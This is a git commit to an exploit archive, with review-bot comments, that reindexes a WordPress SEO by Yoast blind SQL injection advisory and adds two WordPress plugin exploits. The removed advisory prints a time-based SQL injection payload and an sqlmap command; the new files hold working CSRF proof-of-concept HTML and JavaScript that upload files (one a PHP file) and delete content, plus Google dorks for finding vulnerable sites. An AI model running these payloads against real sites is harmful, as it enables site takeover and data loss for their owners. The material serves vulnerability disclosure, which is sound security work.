DB: 2015-04-06

2 new exploits
Offensive Security 2015-04-06 08:36:30 +00:00
parent 005f370f16
commit f7fce69883
4 changed files with 145 additions and 75 deletions


@ -32833,7 +32833,7 @@ id,file,description,date,author,platform,type,port
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
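Review bot: the 36413 row now points at platforms/php/webapps/36413.txt, but the only change to that file in this commit is the deletion of platforms/aix/dos/36413.txt (the 4 changed files are files.csv, that deletion, 36610.txt and 36612.txt, and the 74 removed lines are exactly the advisory), so unless the php/webapps copy already exists in the tree this index entry dangles. If the file is being moved, include it as a rename in the same commit so the csv and the tree change together. The platform/type correction itself (aix,dos to php,webapps) is right for a WordPress plugin blind SQL injection advisory.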
@ -33021,6 +33021,8 @@ id,file,description,date,author,platform,type,port
36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80
36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80
36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80
36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80
36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
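Review bot: the two new rows spell the product "Wordpress" while the existing entries in this file use "WordPress" (the 36413 and 36414 rows in the hunk above); keep the spelling consistent so the descriptions stay searchable, e.g. "WordPress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities". The 36610 description ("Multiple CSRF Vulnerabilities") also does not match the exploit file's own title ("Multiple CSRF File Upload"); pick one wording and use it in both places.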



@ -1,74 +0,0 @@
Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
Version/s Tested: 1.7.3.3
Patched Version: 1.7.4
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
Description:
WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
to improve the Search Engine Optimization (SEO) of WordPress sites. The
latest version at the time of writing (1.7.3.3) has been found to be
affected by two authenticated (admin, editor or author user) Blind SQL
Injection vulnerabilities. The plugin has more than one million downloads
according to WordPress.
Technical Description:
The authenticated Blind SQL Injection vulnerability can be found within the
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
parameters are not sufficiently sanitised before being used within a SQL
query.
Line 529:
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
$_GET['orderby'] ) ) : 'post_title';
Line 533:
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
If the GET orderby parameter value is not empty it will pass its value
through WordPess's own esc_sql() function. According to WordPress this
function 'Prepares a string for use as an SQL query. A glorified
addslashes() that works with arrays.'. However, this is not sufficient to
prevent SQL Injection as can be seen from our Proof of Concept.
Proof of Concept (PoC):
The following GET request will cause the SQL query to execute and sleep for
10 seconds if clicked on as an authenticated admin, editor or author user.
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
Using SQLMap:
python sqlmap.py -u "
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
wordpress_logged_in_9dee67...;"
Impact:
As there is no anti-CSRF protection a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin, editor or author
user to click on a specially crafted link or visit a page they control.
One possible attack scenario would be an attacker adding their own
administrative user to the target WordPress site, allowing them to
compromise the entire web site.
Timeline:
March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
(WPScan Team - Dewhurst Security).
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
expected patch timeline.
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
this issue.
March 11th 2015 - 12:30 GMT: Advisory released.
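Review bot: this is a plain 74-line delete rather than a rename, so the relocation the files.csv hunk implies (aix/dos to php/webapps) loses the blame history of the advisory and, within this commit, leaves no copy of it at the new path; prefer a git rename so the content and the index entry move together. Since the text is being moved anyway, two transcription slips could be fixed at the same time: the "Line 533" excerpt reads `order = esc_sql( strtoupper(` and has lost its leading `$` (the "Line 529" excerpt above it assigns `$orderby`), and "WordPess's own esc_sql() function" should read "WordPress's".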

platforms/php/webapps/36610.txt Executable file

@ -0,0 +1,61 @@
# Exploit Title: Wordpress Video Gallery Plugin Multiple CSRF File Upload
# Google Dork: inurl:/wp-content/plugins/contus-video-gallery
# Date: 31 March 2015
# Exploit Author: Divya
# Vendor Homepage: https://wordpress.org/plugins/contus-video-gallery/
# Software Link: https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Version: 2.8
# Tested on: Windows, Linux
# CVE : None
CSRF File Upload Exploit Code:
<html>
<head>
<title>
WP Plugin CSRF File Upload
</title>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------103932797413649");
xhr.withCredentials = true;
var body = "-----------------------------103932797413649\r\n" +
"Content-Disposition: form-data; name=\"myfile\"; filename=\"test.mp4\"\r\n" +
"Content-Type: video/mp4\r\n" +
"\r\n" +
"hello world how are you\r\n" +
"-----------------------------103932797413649\r\n" +
"Content-Disposition: form-data; name=\"mode\"\r\n" +
"\r\n" +
"video\r\n" +
"-----------------------------103932797413649--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit" onclick="submitRequest();" />
</form>
</body>
</html>
Other CSRF vulnerable areas of application:
URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=video
URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=image
URL: http://192.168.1.2/wp-admin/admin-ajax.php?action=uploadvideo
Data: myfile=[upload_file_details]&mode=srt
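Review bot: the entry never states where admin-ajax.php?action=uploadvideo writes the file or whether the extension is checked, so the impact of the CSRF upload cannot be judged from it: the PoC body sends "hello world how are you" as test.mp4, and the three "other CSRF vulnerable areas" at the end are the same endpoint with mode=video, mode=image and mode=srt, not separate areas. Add the upload destination and say whether a .php filename is accepted (the 36612 entry in this commit documents its upload path and that renamed files are not executable); without that, "Multiple CSRF File Upload" overstates a single upload action with no nonce check. The PoC also hardcodes http://192.168.1.2/ without noting that it is the tester's target host.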

platforms/php/webapps/36612.txt Executable file

@ -0,0 +1,81 @@
# Exploit Title: Wordpress WP Easy Slideshow Plugin Multiple Vulnerabilities
# Google Dork: inurl:/wp-content/uploads/wp-easy-slideshow/
# Date: 2 April 2015
# Exploit Author: Divya
# Vendor Homepage: https://wordpress.org/plugins/wp-easy-slideshow/
# Software Link: https://downloads.wordpress.org/plugin/wp-easy-slideshow.zip
# Version: 1.0.3
# Tested on: Windows, Linux
# CVE : None
Delete operation using CSRF:
<img src="http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=[number]">
Example: http://192.168.1.2/wp-admin/admin.php?page=wss-images&del_id=1
<html>
<head><title>CSRF Delete Operation</title></head>
<body>
<form action="http://192.168.1.2/wp-admin/admin.php">
<input type="hidden" name="page" value="wss-images" />
<input type="hidden" name="del_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Arbitrary File Upload using CSRF:
<html>
<head><title>WP CSRF File Upload</title></head>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1559691976562");
xhr.withCredentials = true;
var body = "-----------------------------1559691976562\r\n" +
"Content-Disposition: form-data; name=\"wss_image\"; filename=\"myfile.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"phpinfo();\r\n" +
"?\x3e\r\n" +
"-----------------------------1559691976562\r\n" +
"Content-Disposition: form-data; name=\"desc_content\"\r\n" +
"\r\n" +
"CSRF File Upload\r\n" +
"-----------------------------1559691976562\r\n" +
"Content-Disposition: form-data; name=\"image_link\"\r\n" +
"\r\n" +
"linkData\r\n" +
"-----------------------------1559691976562\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"-----------------------------1559691976562--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Arbitrary File Upload (Authenticated):
URL: http://192.168.1.2/wp-admin/admin.php?page=wss-add-image
The upload script allows uploading arbitrary files. The files are renamed to numbers like 1,2,3,... The uploaded files cannot be executed on server.
Upload Location: http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/
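Review bot: the CSRF upload PoC posts myfile.php containing phpinfo(), but the closing note says uploaded files are renamed to numbers and "cannot be executed on server", so the "Arbitrary File Upload using CSRF" heading contradicts the stated impact; either show the uploaded file being reached at the documented location (http://192.168.1.2/wp-content/uploads/wp-easy-slideshow/) or downgrade the claim to a CSRF that stores attacker-controlled content. The PoC target is also inconsistent: the upload request goes to http://localhost/wordpress/wp-admin/admin.php?page=wss-add-image while every other URL in the file uses http://192.168.1.2/wp-admin/. The delete-by-GET PoC (page=wss-images&del_id=N via an <img> tag) is the clearer finding here, a state-changing action on a GET request with no nonce, and deserves the lead position.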